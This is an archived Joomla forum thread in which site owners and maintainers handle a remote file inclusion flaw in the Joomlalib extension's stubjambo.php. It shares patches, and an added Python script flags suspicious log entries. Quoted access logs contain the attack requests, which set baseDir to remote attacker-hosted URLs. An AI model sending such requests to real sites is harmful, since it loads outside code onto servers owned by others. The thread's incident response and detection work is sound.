| Joomla! http://forum.joomla.org/ |
|
| Remote File Inclusion: Joomlalib - All versions http://forum.joomla.org/viewtopic.php?f=296&t=213774 |
| Author: | dazzor [ Tue Sep 18, 2007 8:00 am ] |
| Post subject: | Remote File Inclusion: Joomlalib - All versions |
Hi, my provider has sent me an email with the message that there was a hack attempt on the server through my site. According to the log, 'the hacker' included an external URL in stubjambo.php. What can I do about this? I use Joomla 1.0.13, latest PHP and MySQL. |
|
| Author: | infograf768 [ Tue Sep 18, 2007 9:55 am ] |
| Post subject: | Re: hacking attempt com_joomlalib |
Hack attempt does not mean the crack has been done. Please ask your provider to quote the log concerning this. Also, which version of Joomlalib and/or bsq_sitestats are you using? |
|
| Author: | dazzor [ Tue Sep 18, 2007 11:47 am ] |
| Post subject: | Re: hacking attempt com_joomlalib |
log:
Quote:
scoutingranst.be 211.175.61.131 - - [18/Sep/2007:01:09:27 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.freewebtown.com/v3nom/id.txt? HTTP/1.1" 200 52 "-" "libwww-perl/5.79"
I have no idea what version of Joomlalib or bsq_sitestats, the one that comes with Joomla 1.0.12 |
|
| Author: | infograf768 [ Tue Sep 18, 2007 1:42 pm ] |
| Post subject: | Re: hacking attempt com_joomlalib |
They do not come with Joomla. These are 3rd party extensions. |
|
| Author: | dazzor [ Wed Sep 19, 2007 6:39 am ] |
| Post subject: | Re: hacking attempt com_joomlalib |
Ah, but I still have no idea. Any idea where I can find this? |
|
| Author: | RussW [ Wed Sep 19, 2007 6:47 am ] |
| Post subject: | Re: hacking attempt com_joomlalib |
Please log in to your Joomla! Administrator site and list the components; there you will see the versions of the installed items and their respective authors' websites. Check the authors' websites for updates and/or known exploits, and also check their forums for similar problems. These are not core Joomla! extensions. |
|
| Author: | Protozoan [ Wed Sep 19, 2007 4:36 pm ] |
| Post subject: | Remote File Inclusion: Joomlalib - All versions |
Affected component: Joomlalib (necessary for the Gallery2 component)
The log file:
x - - [19/Sep/2007:00:21:00 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://xxxx/tmp/echo3? HTTP/1.1" 200 924 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
File contains:
Code:
<?
/** Create a Joomla/Mambo environment for our example programs
 * @package examples
 */
$baseDir = dirname(__FILE__) . '/';
/** */
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );
$GLOBALS['database'] = $database;
?>
What do you guys suggest as fix? |
|
| Author: | infograf768 [ Thu Sep 20, 2007 4:11 am ] |
| Post subject: | Re: hacking attempt com_joomlalib |
Merging with similar thread. Looks like joomlalib is indeed at stake. |
|
| Author: | 55thinking [ Thu Sep 20, 2007 8:23 am ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Is there a fix available? We are affected... and we are not using the mentioned component; it got injected in our install. |
|
| Author: | amacide [ Thu Sep 20, 2007 10:53 am ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Hi, This is actively being exploited. I don't think the affected file is normally used, if at all - others may be able to confirm... Unfortunately the exploited $baseDir affects Joomla further along the processing, so fixing in this file does not seem to help. If $baseDir is set in the request, then abort, going no further. This may break your sites - works fine for me.
Code:
if(isset($_REQUEST['baseDir'])) { return FALSE;}
Cheers,
Code:
<?
/** Create a Joomla/Mambo environment for our example programs
 * @package examples
 */
if(isset($_REQUEST['baseDir'])) { return FALSE;}
$baseDir = dirname(__FILE__) . '/';
/** */
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );
$GLOBALS['database'] = $database;
?> |
|
| Author: | Protozoan [ Thu Sep 20, 2007 8:10 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
amacide wrote:
Hi, This is actively being exploited. I don't think the affected file is normally used, if at all - others may be able to confirm... Unfortunately the exploited $baseDir affects Joomla further along the processing, so fixing in this file does not seem to help. If $baseDir is set in the request, then abort, going no further. This may break your sites - works fine for me.
Code:
if(isset($_REQUEST['baseDir'])) { return FALSE;}
Cheers,
Code:
<?
/** Create a Joomla/Mambo environment for our example programs
 * @package examples
 */
if(isset($_REQUEST['baseDir'])) { return FALSE;}
$baseDir = dirname(__FILE__) . '/';
/** */
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );
$GLOBALS['database'] = $database;
?>
Fix works here without complications. Thanks for your quick response. |
|
| Author: | hamsel [ Fri Sep 21, 2007 6:54 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
This is certainly at risk! If the injected php code is to be believed, the attack goes way beyond the individual site being hacked for phishing purposes and right into the host's system accounts. I've sent a copy of the injected code to infograf768 - I hope he will comment on the code here, if he gets the time... /hamsel |
|
| Author: | infograf768 [ Sat Sep 22, 2007 8:32 am ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Sending mails around... |
|
| Author: | trompete [ Sat Sep 22, 2007 2:19 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Hi, Infograf was nice enough to make me aware of this vulnerability. I don't think this file is being used either. I'll do a code review since it's been 9 months since I looked at it (life > internet). I'll release a new package with this file removed as soon as I can. Brent |
|
| Author: | trompete [ Sat Sep 22, 2007 2:25 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Where did JoomlaLib and BSQ go on the extensions site? That wasn't very nice. |
|
| Author: | trompete [ Sat Sep 22, 2007 2:40 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
I posted a new version here: http://joomlacode.org/gf/project/joomlalib/frs/ I still can't find the extension site entries to update them, but here's the fixed version. |
|
| Author: | infograf768 [ Sat Sep 22, 2007 2:49 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Brent, Thanks for your fast reply. JED admins took it off until fix made. Usual policy. We were very much worrying this morning about these reports. BSQ sitestats is concerned but also the Gallery2 extension I guess. Please let ot2sen (Ole) know when you have uploaded new versions on joomlacode for the components too. JM |
|
| Author: | ot2sen [ Sat Sep 22, 2007 3:25 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
trompete wrote: I posted a new version here: http://joomlacode.org/gf/project/joomlalib/frs/ I still can't find the extension site entries to update them, but here's the fixed version.
BSQ and Gallery2Bridge published again. Feel welcome to update descriptions and version info. Thanks
|
|
| Author: | dracula [ Tue Oct 09, 2007 11:44 am ] |
| Post subject: | Site hacked through joomlalib |
I have posted the problem in the dev forum of joomlalib, so I will just post here the link to their forum: http://forum.4theweb.nl/showthread.php?p=5020#post5020 From my point of view, the newest joomlalib is also affected! |
|
| Author: | infograf768 [ Tue Oct 09, 2007 1:47 pm ] |
| Post subject: | Re: Site hacked through joomlalib |
Moving to the related thread. |
|
| Author: | infograf768 [ Tue Oct 09, 2007 1:48 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
@trompete Can you look into that? |
|
| Author: | trompete [ Tue Oct 09, 2007 1:52 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Later. It's office hours here in the USA. I should be able to look at 8 PM CST (GMT - 6) |
|
| Author: | Michiel_1981 [ Tue Oct 09, 2007 2:19 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
infograf768 wrote: @trompete Can you look into that?
Just looked into this with trompete, and there is NO known include like this in the code anymore; we emptied the file completely in the latest release. So post the complete file content and file name, so we can look into this! Kind regards, Michiel EDIT: forgot 1 word |
|
| Author: | infograf768 [ Tue Oct 09, 2007 2:25 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Thanks folks.
|
|
| Author: | dracula [ Tue Oct 09, 2007 3:14 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Thanks. Didn't see this topic, and the latest link I found on 4theweb.nl was going to a 1.3.1 version which still had the problem. |
|
| Author: | geoffjones [ Sat Mar 21, 2009 7:52 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Just looked at my error logs and this exploit is still being tried. Found the source from 4 origins, just in one day: [RussW IP Addresses Removed, pointless exercise, these could be other compromised sites, via proxies or hijacked, the IP addresses potentially mean nothing and do not assist with issue diagnosis or resolution ] Put these in http://ip-address-lookup-v4.com/ to see their origins!!!!!!!!!! I am running 1.0.15, and this directory/file does not reside on my website. |
|
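Added example, not part of the thread and not code from Joomlalib or any poster: a log triage script for the kind of access-log entries quoted above, separating requests that reached an existing script (status 200, as in the two quoted logs) from probes against a file that is not installed (the situation in the last post). The sample lines are constructed, the hosts `site.example` and `remote.example` are hypothetical, and the names `triage` and `verdict` are the example's own.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log format; the leading virtual-host field is optional
# (the first log quoted in the thread has one, the second does not).
LINE = re.compile(
    r'^(?:(?P<vhost>\S+) )?(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
REMOTE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def verdict(status):
    # The status only tells whether the targeted script exists and ran,
    # not whether the remote include succeeded.
    if status == 200:
        return "served"   # script present and answered: inspect the host
    if status == 404:
        return "probe"    # script absent: scanner noise
    return "other"        # e.g. 403 from a server-side block

def triage(lines):
    """Return one finding per request parameter whose value is a URL."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes, so baseDir=http%3A%2F%2F... is caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE.match(value):
                status = int(m["status"])
                findings.append((m["ip"], path, name, status, verdict(status)))
    return findings

# Constructed sample lines (documentation addresses, hypothetical hosts).
SAMPLE = [
    'site.example 192.0.2.10 - - [18/Sep/2007:01:09:27 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://remote.example/id.txt? HTTP/1.1" 200 52 "-" "libwww-perl/5.79"',
    '198.51.100.7 - - [21/Mar/2009:10:00:00 +0000] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http%3A%2F%2Fremote.example%2Fecho3%3F HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [21/Mar/2009:10:01:00 +0000] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A "served" finding means the script exists and answered, which calls for checking the installed component version and the host; it does not by itself show that the include succeeded.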